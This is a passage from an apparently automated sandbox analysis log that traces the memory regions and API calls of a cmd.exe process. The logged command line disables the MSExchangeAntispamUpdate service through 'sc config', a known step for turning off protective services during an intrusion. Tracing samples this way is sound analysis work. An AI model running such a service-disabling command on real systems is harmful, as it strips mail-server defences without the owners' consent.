"c:\\windows\\system32\\wow64cpu.dll") Region: id = 6883 start_va = 0x4880000 end_va = 0x488ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004880000" filename = "" Region: id = 6884 start_va = 0x48a0000 end_va = 0x48affff entry_point = 0x0 region_type = private name = "private_0x00000000048a0000" filename = "" Region: id = 6885 start_va = 0x4b60000 end_va = 0x4b9ffff entry_point = 0x0 region_type = private name = "private_0x0000000004b60000" filename = "" Region: id = 6886 start_va = 0x4c00000 end_va = 0x4cbdfff entry_point = 0x4c00000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 6887 start_va = 0x4cc0000 end_va = 0x4dbffff entry_point = 0x0 region_type = private name = "private_0x0000000004cc0000" filename = "" Region: id = 6888 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 6889 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 6890 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 6891 start_va = 0x7e620000 end_va = 0x7e71ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e620000" filename = "" Region: id = 6892 start_va = 0x7e746000 end_va = 0x7e748fff entry_point = 0x0 region_type = private name = "private_0x000000007e746000" filename = "" Region: id = 6893 start_va = 0x4890000 end_va = 0x4893fff entry_point = 0x0 region_type = private name = "private_0x0000000004890000" filename = "" Region: id = 6894 start_va = 0x4a40000 end_va = 0x4a43fff entry_point = 0x0 region_type = private name = "private_0x0000000004a40000" filename = "" Region: id = 6895 start_va = 0x4dc0000 end_va = 0x50f6fff entry_point = 0x4dc0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 432 os_tid = 0xf04 [0129.523] GetModuleHandleA (lpModuleName=0x0) returned 0x3c0000 [0129.523] __set_app_type (_Type=0x1) [0129.523] __p__fmode () returned 0x77ac4d6c [0129.523] __p__commode () returned 0x77ac5b1c [0129.523] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x3d36e0) returned 0x0 [0129.523] __getmainargs (in: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0, _DoWildCard=0, _StartInfo=0x3e50fc | out: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0) returned 0 [0129.523] GetCurrentThreadId () returned 0xf04 [0129.523] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xf04) returned 0x84 [0129.523] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0129.523] GetProcAddress (hModule=0x77670000, lpProcName="SetThreadUILanguage") returned 0x776b2780 [0129.524] SetThreadUILanguage (LangId=0x0) returned 0x409 [0129.526] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0129.526] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x4a0ff0c | out: phkResult=0x4a0ff0c*=0x0) returned 0x2 [0129.526] VirtualQuery (in: lpAddress=0x4a0ff13, lpBuffer=0x4a0fec4, dwLength=0x1c | out: lpBuffer=0x4a0fec4*(BaseAddress=0x4a0f000, AllocationBase=0x4910000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0129.526] VirtualQuery (in: lpAddress=0x4910000, lpBuffer=0x4a0fec4, dwLength=0x1c | out: lpBuffer=0x4a0fec4*(BaseAddress=0x4910000, AllocationBase=0x4910000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0129.526] VirtualQuery (in: lpAddress=0x4911000, lpBuffer=0x4a0fec4, dwLength=0x1c | out: lpBuffer=0x4a0fec4*(BaseAddress=0x4911000, AllocationBase=0x4910000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0129.526] VirtualQuery (in: lpAddress=0x4913000, lpBuffer=0x4a0fec4, dwLength=0x1c | out: lpBuffer=0x4a0fec4*(BaseAddress=0x4913000, AllocationBase=0x4910000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0129.526] VirtualQuery (in: lpAddress=0x4a10000, lpBuffer=0x4a0fec4, dwLength=0x1c | out: lpBuffer=0x4a0fec4*(BaseAddress=0x4a10000, AllocationBase=0x4a10000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0129.526] GetConsoleOutputCP () returned 0x1b5 [0129.526] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0129.527] SetConsoleCtrlHandler (HandlerRoutine=0x3df980, Add=1) returned 1 [0129.527] _get_osfhandle (_FileHandle=1) returned 0x3c [0129.527] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x0) returned 1 [0129.527] _get_osfhandle (_FileHandle=1) returned 0x3c [0129.527] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0129.527] _get_osfhandle (_FileHandle=1) returned 0x3c [0129.527] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0129.527] _get_osfhandle (_FileHandle=0) returned 0x38 [0129.527] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0129.528] _get_osfhandle (_FileHandle=0) returned 0x38 [0129.528] SetConsoleMode (hConsoleHandle=0x38, dwMode=0x1e7) returned 1 [0129.528] GetEnvironmentStringsW () returned 0x4a67db0* [0129.528] FreeEnvironmentStringsA (penv="A") returned 1 [0129.528] GetEnvironmentStringsW () returned 0x4a67db0* [0129.528] FreeEnvironmentStringsA (penv="A") returned 1 [0129.528] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x4a0ee70 | out: phkResult=0x4a0ee70*=0x94) returned 0x0 [0129.528] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x4a0ee74, lpData=0x4a0ee7c, lpcbData=0x4a0ee78*=0x1000 | out: lpType=0x4a0ee74*=0x0, lpData=0x4a0ee7c*=0xb8, lpcbData=0x4a0ee78*=0x1000) returned 0x2 [0129.528] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x4a0ee74, lpData=0x4a0ee7c, lpcbData=0x4a0ee78*=0x1000 | out: lpType=0x4a0ee74*=0x4, lpData=0x4a0ee7c*=0x1, lpcbData=0x4a0ee78*=0x4) returned 0x0 [0129.528] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x4a0ee74, lpData=0x4a0ee7c, lpcbData=0x4a0ee78*=0x1000 | out: lpType=0x4a0ee74*=0x0, lpData=0x4a0ee7c*=0x1, lpcbData=0x4a0ee78*=0x1000) returned 0x2 [0129.528] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x4a0ee74, lpData=0x4a0ee7c, lpcbData=0x4a0ee78*=0x1000 | out: lpType=0x4a0ee74*=0x4, lpData=0x4a0ee7c*=0x0, lpcbData=0x4a0ee78*=0x4) returned 0x0 [0129.528] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x4a0ee74, lpData=0x4a0ee7c, lpcbData=0x4a0ee78*=0x1000 | out: lpType=0x4a0ee74*=0x4, lpData=0x4a0ee7c*=0x40, lpcbData=0x4a0ee78*=0x4) returned 0x0 [0129.528] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x4a0ee74, lpData=0x4a0ee7c, lpcbData=0x4a0ee78*=0x1000 | out: lpType=0x4a0ee74*=0x4, lpData=0x4a0ee7c*=0x40, lpcbData=0x4a0ee78*=0x4) returned 0x0 [0129.528] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x4a0ee74, lpData=0x4a0ee7c, lpcbData=0x4a0ee78*=0x1000 | out: lpType=0x4a0ee74*=0x0, lpData=0x4a0ee7c*=0x40, lpcbData=0x4a0ee78*=0x1000) returned 0x2 [0129.528] RegCloseKey (hKey=0x94) returned 0x0 [0129.529] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x4a0ee70 | out: phkResult=0x4a0ee70*=0x94) returned 0x0 [0129.529] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x4a0ee74, lpData=0x4a0ee7c, lpcbData=0x4a0ee78*=0x1000 | out: lpType=0x4a0ee74*=0x0, lpData=0x4a0ee7c*=0x40, lpcbData=0x4a0ee78*=0x1000) returned 0x2 [0129.529] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x4a0ee74, lpData=0x4a0ee7c, lpcbData=0x4a0ee78*=0x1000 | out: lpType=0x4a0ee74*=0x4, lpData=0x4a0ee7c*=0x1, lpcbData=0x4a0ee78*=0x4) returned 0x0 [0129.529] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x4a0ee74, lpData=0x4a0ee7c, lpcbData=0x4a0ee78*=0x1000 | out: lpType=0x4a0ee74*=0x0, lpData=0x4a0ee7c*=0x1, lpcbData=0x4a0ee78*=0x1000) returned 0x2 [0129.529] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x4a0ee74, lpData=0x4a0ee7c, lpcbData=0x4a0ee78*=0x1000 | out: lpType=0x4a0ee74*=0x4, lpData=0x4a0ee7c*=0x0, lpcbData=0x4a0ee78*=0x4) returned 0x0 [0129.529] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x4a0ee74, lpData=0x4a0ee7c, lpcbData=0x4a0ee78*=0x1000 | out: lpType=0x4a0ee74*=0x4, lpData=0x4a0ee7c*=0x9, lpcbData=0x4a0ee78*=0x4) returned 0x0 [0129.529] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x4a0ee74, lpData=0x4a0ee7c, lpcbData=0x4a0ee78*=0x1000 | out: lpType=0x4a0ee74*=0x4, lpData=0x4a0ee7c*=0x9, lpcbData=0x4a0ee78*=0x4) returned 0x0 [0129.529] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x4a0ee74, lpData=0x4a0ee7c, lpcbData=0x4a0ee78*=0x1000 | out: lpType=0x4a0ee74*=0x0, lpData=0x4a0ee7c*=0x9, lpcbData=0x4a0ee78*=0x1000) returned 0x2 [0129.529] RegCloseKey (hKey=0x94) returned 0x0 [0129.529] time (in: timer=0x0 | out: timer=0x0) returned 0x5ad29832 [0129.529] srand (_Seed=0x5ad29832) [0129.529] GetCommandLineW () returned="/c sc config MSExchangeAntispamUpdate start= disabled" [0129.529] GetCommandLineW () returned="/c sc config MSExchangeAntispamUpdate start= disabled" [0129.529] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0129.529] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4a69d08, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0129.529] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0129.529] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0129.529] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0129.529] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0129.529] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0129.529] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0129.529] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0129.529] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0129.529] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0129.529] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0129.529] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0129.529] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0129.529] GetEnvironmentStringsW () returned 0x4a67db0* [0129.530] FreeEnvironmentStringsA (penv="A") returned 1 [0129.530] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0129.530] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0129.530] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0129.530] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0129.530] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0129.530] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0129.530] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0129.530] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0129.530] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0129.530] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0129.530] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a0fc48 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0129.530] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", nBufferLength=0x104, lpBuffer=0x4a0fc48, lpFilePart=0x4a0fc40 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x4a0fc40*="Desktop") returned 0x1d [0129.530] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0129.530] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x4a0f9c8 | out: lpFindFileData=0x4a0f9c8) returned 0x4a605c8 [0129.530] FindClose (in: hFindFile=0x4a605c8 | out: hFindFile=0x4a605c8) returned 1 [0129.530] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps", lpFindFileData=0x4a0f9c8 | out: lpFindFileData=0x4a0f9c8) returned 0x4a605c8 [0129.530] FindClose (in: hFindFile=0x4a605c8 | out: hFindFile=0x4a605c8) returned 1 [0129.530] _wcsnicmp (_String1="CIIHMN~1", _String2="CIiHmnxMn6Ps", _MaxCount=0xc) returned 6 [0129.530] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFindFileData=0x4a0f9c8 | out: lpFindFileData=0x4a0f9c8) returned 0x4a605c8 [0129.530] FindClose (in: hFindFile=0x4a605c8 | out: hFindFile=0x4a605c8) returned 1 [0129.531] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0129.531] SetCurrentDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 1 [0129.531] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 1 [0129.531] GetEnvironmentStringsW () returned 0x4a67db0* [0129.531] FreeEnvironmentStringsA (penv="=") returned 1 [0129.531] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0129.531] GetConsoleOutputCP () returned 0x1b5 [0129.531] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0129.531] GetUserDefaultLCID () returned 0x409 [0129.532] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x3f24a0, cchData=8 | out: lpLCData=":") returned 2 [0129.532] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x4a0fd78, cchData=128 | out: lpLCData="0") returned 2 [0129.532] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x4a0fd78, cchData=128 | out: lpLCData="0") returned 2 [0129.532] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x4a0fd78, cchData=128 | out: lpLCData="1") returned 2 [0129.532] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x3f24b0, cchData=8 | out: lpLCData="/") returned 2 [0129.532] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x3f2500, cchData=32 | out: lpLCData="Mon") returned 4 [0129.532] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x3f2540, cchData=32 | out: lpLCData="Tue") returned 4 [0129.532] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x3f2580, cchData=32 | out: lpLCData="Wed") returned 4 [0129.532] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x3f25c0, cchData=32 | out: lpLCData="Thu") returned 4 [0129.532] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x3f2600, cchData=32 | out: lpLCData="Fri") returned 4 [0129.532] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x3f2640, cchData=32 | out: lpLCData="Sat") returned 4 [0129.532] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x3f2680, cchData=32 | out: lpLCData="Sun") returned 4 [0129.532] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x3f24c0, cchData=8 | out: lpLCData=".") returned 2 [0129.532] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x3f24e0, cchData=8 | out: lpLCData=",") returned 2 [0129.532] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0129.533] GetConsoleTitleW (in: lpConsoleTitle=0x4a6aa68, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0129.533] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0129.533] GetProcAddress (hModule=0x77670000, lpProcName="CopyFileExW") returned 0x7768fa80 [0129.533] GetProcAddress (hModule=0x77670000, lpProcName="IsDebuggerPresent") returned 0x7768a790 [0129.533] GetProcAddress (hModule=0x77670000, lpProcName="SetConsoleInputExeNameW") returned 0x76a835c0 [0129.533] _wcsicmp (_String1="sc", _String2=")") returned 74 [0129.533] _wcsicmp (_String1="FOR", _String2="sc") returned -13 [0129.533] _wcsicmp (_String1="FOR/?", _String2="sc") returned -13 [0129.533] _wcsicmp (_String1="IF", _String2="sc") returned -10 [0129.533] _wcsicmp (_String1="IF/?", _String2="sc") returned -10 [0129.533] _wcsicmp (_String1="REM", _String2="sc") returned -1 [0129.533] _wcsicmp (_String1="REM/?", _String2="sc") returned -1 [0129.534] GetConsoleTitleW (in: lpConsoleTitle=0x4a0fa60, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0129.535] _wcsicmp (_String1="sc", _String2="DIR") returned 15 [0129.535] _wcsicmp (_String1="sc", _String2="ERASE") returned 14 [0129.535] _wcsicmp (_String1="sc", _String2="DEL") returned 15 [0129.535] _wcsicmp (_String1="sc", _String2="TYPE") returned -1 [0129.535] _wcsicmp (_String1="sc", _String2="COPY") returned 16 [0129.535] _wcsicmp (_String1="sc", _String2="CD") returned 16 [0129.535] _wcsicmp (_String1="sc", _String2="CHDIR") returned 16 [0129.535] _wcsicmp (_String1="sc", _String2="RENAME") returned 1 [0129.535] _wcsicmp (_String1="sc", _String2="REN") returned 1 [0129.535] _wcsicmp (_String1="sc", _String2="ECHO") returned 14 [0129.535] _wcsicmp (_String1="sc", _String2="SET") returned -2 [0129.535] _wcsicmp (_String1="sc", _String2="PAUSE") returned 3 [0129.535] _wcsicmp (_String1="sc", _String2="DATE") returned 15 [0129.535] _wcsicmp (_String1="sc", _String2="TIME") returned -1 [0129.535] _wcsicmp (_String1="sc", _String2="PROMPT") returned 3 [0129.535] _wcsicmp (_String1="sc", _String2="MD") returned 6 [0129.535] _wcsicmp (_String1="sc", _String2="MKDIR") returned 6 [0129.535] _wcsicmp (_String1="sc", _String2="RD") returned 1 [0129.535] _wcsicmp (_String1="sc", _String2="RMDIR") returned 1 [0129.535] _wcsicmp (_String1="sc", _String2="PATH") returned 3 [0129.535] _wcsicmp (_String1="sc", _String2="GOTO") returned 12 [0129.535] _wcsicmp (_String1="sc", _String2="SHIFT") returned -5 [0129.535] _wcsicmp (_String1="sc", _String2="CLS") returned 16 [0129.535] _wcsicmp (_String1="sc", _String2="CALL") returned 16 [0129.535] _wcsicmp (_String1="sc", _String2="VERIFY") returned -3 [0129.535] _wcsicmp (_String1="sc", _String2="VER") returned -3 [0129.535] _wcsicmp (_String1="sc", _String2="VOL") returned -3 [0129.535] _wcsicmp (_String1="sc", _String2="EXIT") returned 14 [0129.535] _wcsicmp (_String1="sc", _String2="SETLOCAL") returned -2 [0129.535] _wcsicmp (_String1="sc", _String2="ENDLOCAL") returned 14 [0129.535] _wcsicmp (_String1="sc", _String2="TITLE") returned -1 [0129.535] _wcsicmp (_String1="sc", _String2="START") returned -17 [0129.535] _wcsicmp (_String1="sc", _String2="DPATH") returned 15 [0129.535] _wcsicmp (_String1="sc", _String2="KEYS") returned 8 [0129.535] _wcsicmp (_String1="sc", _String2="MOVE") returned 6 [0129.535] _wcsicmp (_String1="sc", _String2="PUSHD") returned 3 [0129.535] _wcsicmp (_String1="sc", _String2="POPD") returned 3 [0129.535] _wcsicmp (_String1="sc", _String2="ASSOC") returned 18 [0129.535] _wcsicmp (_String1="sc", _String2="FTYPE") returned 13 [0129.535] _wcsicmp (_String1="sc", _String2="BREAK") returned 17 [0129.535] _wcsicmp (_String1="sc", _String2="COLOR") returned 16 [0129.535] _wcsicmp (_String1="sc", _String2="MKLINK") returned 6 [0129.535] _wcsicmp (_String1="sc", _String2="DIR") returned 15 [0129.535] _wcsicmp (_String1="sc", _String2="ERASE") returned 14 [0129.535] _wcsicmp (_String1="sc", _String2="DEL") returned 15 [0129.535] _wcsicmp (_String1="sc", _String2="TYPE") returned -1 [0129.535] _wcsicmp (_String1="sc", _String2="COPY") returned 16 [0129.535] _wcsicmp (_String1="sc", _String2="CD") returned 16 [0129.536] _wcsicmp (_String1="sc", _String2="CHDIR") returned 16 [0129.536] _wcsicmp (_String1="sc", _String2="RENAME") returned 1 [0129.536] _wcsicmp (_String1="sc", _String2="REN") returned 1 [0129.536] _wcsicmp (_String1="sc", _String2="ECHO") returned 14 [0129.536] _wcsicmp (_String1="sc", _String2="SET") returned -2 [0129.536] _wcsicmp (_String1="sc", _String2="PAUSE") returned 3 [0129.536] _wcsicmp (_String1="sc", _String2="DATE") returned 15 [0129.536] _wcsicmp (_String1="sc", _String2="TIME") returned -1 [0129.536] _wcsicmp (_String1="sc", _String2="PROMPT") returned 3 [0129.536] _wcsicmp (_String1="sc", _String2="MD") returned 6 [0129.536] _wcsicmp (_String1="sc", _String2="MKDIR") returned 6 [0129.536] _wcsicmp (_String1="sc", _String2="RD") returned 1 [0129.536] _wcsicmp (_String1="sc", _String2="RMDIR") returned 1 [0129.536] _wcsicmp (_String1="sc", _String2="PATH") returned 3 [0129.536] _wcsicmp (_String1="sc", _String2="GOTO") returned 12 [0129.536] _wcsicmp (_String1="sc", _String2="SHIFT") returned -5 [0129.536] _wcsicmp (_String1="sc", _String2="CLS") returned 16 [0129.536] _wcsicmp (_String1="sc", _String2="CALL") returned 16 [0129.536] _wcsicmp (_String1="sc", _String2="VERIFY") returned -3 [0129.536] _wcsicmp (_String1="sc", _String2="VER") returned -3 [0129.536] _wcsicmp (_String1="sc", _String2="VOL") returned -3 [0129.536] _wcsicmp (_String1="sc", _String2="EXIT") returned 14 [0129.536] _wcsicmp (_String1="sc", _String2="SETLOCAL") returned -2 [0129.536] _wcsicmp (_String1="sc", _String2="ENDLOCAL") returned 14 [0129.536] _wcsicmp (_String1="sc", _String2="TITLE") returned -1 [0129.536] _wcsicmp (_String1="sc", _String2="START") returned -17 [0129.536] _wcsicmp (_String1="sc", _String2="DPATH") returned 15 [0129.536] _wcsicmp (_String1="sc", _String2="KEYS") returned 8 [0129.536] _wcsicmp (_String1="sc", _String2="MOVE") returned 6 [0129.536] _wcsicmp (_String1="sc", _String2="PUSHD") returned 3 [0129.536] _wcsicmp (_String1="sc", _String2="POPD") returned 3 [0129.536] _wcsicmp (_String1="sc", _String2="ASSOC") returned 18 [0129.536] _wcsicmp (_String1="sc", _String2="FTYPE") returned 13 [0129.536] _wcsicmp (_String1="sc", _String2="BREAK") returned 17 [0129.536] _wcsicmp (_String1="sc", _String2="COLOR") returned 16 [0129.536] _wcsicmp (_String1="sc", _String2="MKLINK") returned 6 [0129.536] _wcsicmp (_String1="sc", _String2="FOR") returned 13 [0129.536] _wcsicmp (_String1="sc", _String2="IF") returned 10 [0129.536] _wcsicmp (_String1="sc", _String2="REM") returned 1 [0129.536] _wcsnicmp (_String1="sc", _String2="cmd ", _MaxCount=0x4) returned 16 [0129.536] SetErrorMode (uMode=0x0) returned 0x0 [0129.536] SetErrorMode (uMode=0x1) returned 0x0 [0129.537] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x4a605d0, lpFilePart=0x4a0f56c | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x4a0f56c*="Desktop") returned 0x1d [0129.537] SetErrorMode (uMode=0x0) returned 0x1 [0129.537] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0129.537] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0129.544] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0129.544] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0129.544] GetConsoleTitleW (in: lpConsoleTitle=0x4a0f7ec, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0129.544] InitializeProcThreadAttributeList (in: lpAttributeList=0x4a0f718, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x4a0f6fc | out: lpAttributeList=0x4a0f718, lpSize=0x4a0f6fc) returned 1 [0129.545] UpdateProcThreadAttribute (in: lpAttributeList=0x4a0f718, dwFlags=0x0, Attribute=0x60001, lpValue=0x4a0f704, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x4a0f718, lpPreviousValue=0x0) returned 1 [0129.545] GetStartupInfoW (in: lpStartupInfo=0x4a0f750 | out: lpStartupInfo=0x4a0f750*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0129.545] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0129.545] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0129.545] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0129.545] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0129.545] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) 